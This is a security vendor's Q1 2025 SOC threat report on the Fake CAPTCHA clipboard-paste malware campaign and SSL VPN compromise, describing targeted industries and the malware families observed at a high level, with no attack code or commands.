Q1 2025 Blackpoint Cyber SOC Insights 

The year 2025 has started with a bang in the cybercriminal landscape. Ransomware operators have continued to wreak havoc on organizations worldwide, malware operators have consistently advanced their operations and deployment methodologies, and advanced persistent threat (APT) groups have remained focused on stealthy operations aimed at data theft. These threats are not new to Blackpoint’s Security Operations Center (SOC), with our team responding 24/7 to the threats that attempt to target our partners, thwarting attempts to deploy malware, move laterally, and shut down access to environments throughout the first quarter of 2025.  

From January 01 to March 31, 2025, Blackpoint’s SOC responded to a total of 6,644 incidents across on-premises, Microsoft 365, and Google Workspace protected environments. In this blog, we’ll dive into the two most prevalent threats Blackpoint’s SOC has observed in the first quarter of 2025 – Secure Sockets Layer Virtual Private Network (SSL VPN) compromise and the Fake CAPTCHA campaign – why they matter for our partners, and possible mitigations using your existing tech stack alongside Blackpoint Cyber’s managed services.  

Q1 High-Level Overview 

From January 01 to March 28, 2025, Blackpoint’s SOC responded to incidents impacting nearly every vertical; however, the top three verticals targeted within incidents observed included:  

• Industrials (Manufacturing and Construction & Engineering) 
• Professional & Commercial Services (Business Services) 
• Consumer Cyclicals  

Critical industries, like Construction & Engineering and Manufacturing, oftentimes directly contribute to a nation’s gross domestic product (GDP), create jobs, and support other industries, host an incredible amount of sensitive data, can be used to launch supply chain attacks, and cannot afford significant downtime from devastating cyberattacks. These factors make them attractive targets for all levels of threat actors including ransomware operators, information stealing groups, and initial access brokers (IABs). It is likely these verticals will continue to be primary targets for threat actors over the next 3-6 months.  

Fake CAPTCHA Campaign 

Threat actors have been increasingly abusing CAPTCHA prompts to lure victims into copying scripts and executing them, effectively deploying malware within the compromised environments. There have been dozens of external reports covering this campaign, with almost all incidents following roughly the same pattern.  

1. A user receives a phishing email or navigates to a compromised website.  
2. The user is prompted with further instruction to prove they are “not a robot”.  
3. The user is often instructed to click a button with the phrase “I’m not a robot” or something similar. 
4. Once the button is clicked, it copies embedded code directly into the victim’s clipboard.  
5. The user is instructed to open the run command and use “CTRL+v” to paste in the payload that was copied to the clipboard. 
6. The user is instructed to hit enter. 

Once a victim has completed these steps, they are redirected to a sequence of URLs that result in the deployment of malware. Variants Blackpoint’s SOC has successfully isolated have included Lumma Stealer, SocGholish, NetSupport RAT, AsyncRAT, Venom RAT, Xworm, and more. Blackpoint’s SOC responded to fake CAPTCHA incidents impacting nearly all verticals, with Professional & Commercial Services (Business Services), Institutions & Organizations, and Real Estate verticals being the most impacted.  

More details on the campaign Blackpoint’s SOC has responded to can be found in Blackpoint’s Fake CAPTCHA blog.  

SSL VPN Compromise for Initial Access 

Blackpoint’s SOC has also responded to dozens of incidents in the first quarter of 2025 that have been the likely result of threat actors compromising SSL VPN instances by either compromising stolen or weak credentials, exploiting vulnerabilities, or exposed instances. Blackpoint’s SOC responded to incidents impacting the Industrials Manufacturing), Industrials (Construction & Engineering), and Healthcare verticals most frequently this quarter.  

An SSL VPN is a service the provides users secure access to a network, applications, or utilities from any device. These devices have proven to be an ever-growing attractive target for threat actors of all types. Abusing these devices can have devasting impacts on a victim organization, including ransomware deployment and stealing sensitive data that can be used for further attacks or to be sold on cybercriminal forums. 

Blackpoint’s SOC has observed targeting with remote access trojans (RATs), such as NetSupport RAT and RuRAT; Cobalt Strike (a post-exploitation tool commonly observed in cyberattacks); and attempted ransomware attacks attributed to Akira, Fog, and LockBit 3.0. Blackpoint’s SOC has effectively isolated these and worked with our partners to mitigate the threats.  

Additionally, Blackpoint’s SOC and APG teams have worked together to provide emerging threat information to our partners regarding vulnerabilities disclosed in SSL VPN providers throughout the first quarter of 2025.   

Conclusion 

Blackpoint’s APG assesses that it is very likely both the Fake CAPTCHA campaign and the targeting of SSL VPN instances are very likely to continue through the second quarter of 2025. This assessment is based on the frequency of SOC-observed incidents and external reporting related to both threats.  

Threat actors have appeared to find success in the Fake CAPTCHA campaign, utilizing the comfort and complacency of frequently observed verification methods, to trick victims into deploying malware onto their own systems. Security surveys have identified that more than 60% of U.S.-based users have the same password for more than one account, while 13% us the same password for nearly all accounts [https://www.getastra.com/blog/security-audit/password-statistics/]. This type of password reuse can provide an opportunity for threat actors to conduct brute-force attacks and purchase stolen credentials on cybercriminal forums that are likely to work for corporate user accounts as well.  

Blackpoint’s SOC has continuously identified and prevented these types of attacks throughout the first quarter of 2025 and will continue to thwart these threat actors from successfully targeting our partners. Blackpoint’s SOC and APG will continue to monitor the threat landscape and keep our partners up to date on the current threats.